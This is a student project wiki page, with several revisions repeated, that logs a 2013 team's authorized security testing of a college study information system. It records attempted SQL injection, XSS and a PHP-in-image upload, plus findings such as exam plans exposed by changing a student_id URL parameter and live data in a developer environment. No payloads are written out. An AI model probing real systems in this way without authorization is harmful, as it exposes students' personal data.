** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)'''

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to eachother about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to eachother ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** Made presentation about Misconfigured Configuration.
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** Made presentation of Sensitive Data Exposure

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to eachother ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-04T14:57:51Z

Saus: /* Results */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)'''

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to eachother about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to eachother ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Uploaded a picture (for a lecturer) infected with malicious .php code

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?

I tried this one thing all by myself that I found searching in google. I tried to upload a profile picture that had malicious .php code inside of it as a lecturer as they have right to do that. Unfortunately that didn't work and the php code was not rendered. I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.

I also learned to program sumorobots, more about Linux and Wireshark. We made the presentation structure together. And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
'''What I did?'''
* Tried to find out possible security holes from OIS site.
* Tested different attacking methods with DVWA
* SQL-injection tests into various places on OIS site.
* Tested some XSS methods
* Made presentation about Misconfigured Configuration.
* Prepared our presentation with other group members
* Spoke in daily summary
* Studied a lot of information to know what is hacking about?

'''What i learned?'''
* I learned how to use SQL-injection, XSS, Brute force, CSRF
* I learned also how to use Kali,Backtrack,Temper data, DVWA
* Working in international group
* How important documentation is
* Found out how important it is to make web-application secure

====Mika Salmela====
'''What I did?'''
* I studied hacking methods
* Tried some hacking methods with DVWA
* Iscanned website, try to find if there is some security risks
* Tried some SQL and XSS injections
* Made presentation of Sensitive Data Exposure

'''What I learned?'''
* More than basics of how to hack?
* The most common hacking methods and how to use them.
* How to do SQL and XSS injections
* Basics of hacking tools
* How to find security risks
* How to work in international team.
* Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
'''What I did:'''
* Searched for security holes in OIS student information site.
* Used DVWA tool to test sql injections and xss scripting.
* Tried some sql injections and xss scripting on OIS page
* Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
* Prepared some slides for the main presentation

'''What have I learned:'''
* Theory about OWASP TOP 10 threats
* How to do sql injections
* How to use Firefox tamperdata tool
* How to do cross-site scripting
* Completely understood what is use case and how to draw them
* How to monitor activities with Wireshark
* How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
I have learned about security breaches on the web. Have tried different parts of web for vulnerabilities and injection. Together with team learned how to make injection and XSS attacks using Linux. Through Linux was unfamiliar for me. Together with team we divided roles and found out most important points for presentation. Last but not least coworking with team and reaching same goal was one important task. I and Sandra were responsible for the final presentation structure.

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-04T14:40:51Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
